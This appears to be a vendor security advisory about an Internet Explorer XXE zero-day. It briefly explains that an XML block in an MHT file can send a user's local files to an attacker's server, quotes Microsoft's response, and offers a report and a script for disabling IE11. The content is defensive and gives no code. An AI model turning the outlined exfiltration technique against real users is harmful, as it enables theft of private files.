A new Internet Explorer XXE vulnerability has been disclosed. This zero-day vulnerability allows attackers to steal local files if someone opens a malicious file. Worst of all, it will most likely not get patched until next month’s Patch Tuesday.
A proof of concept of this vulnerability was released earlier this week by researcher John Page. It details how attackers can use an XML External Entity or XXE attack. This attack utilizes an XML block inside of an MHT file to send local files from a user’s computer to the attacker’s web server.
Microsoft’s response to the zero-day vulnerability is unfortunately not very concise. After the vulnerability was reported near the end of March, the following response was given:
«We determined that a fix for this issue will be considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case.»
Hopefully this means that the May Patch Tuesday will include a fix for this issue, in the mean time we’ve created a custom color-coded report to identify which devices in your network have Internet Explorer enabled.
Since there is no fix available yet, we’ve also shared a script to disable Internet Explorer 11 on Windows 10 machines as a crude fix. The script can be deployed using the Lansweeper deployment module to ensure Internet Explorer 11 can’t be used.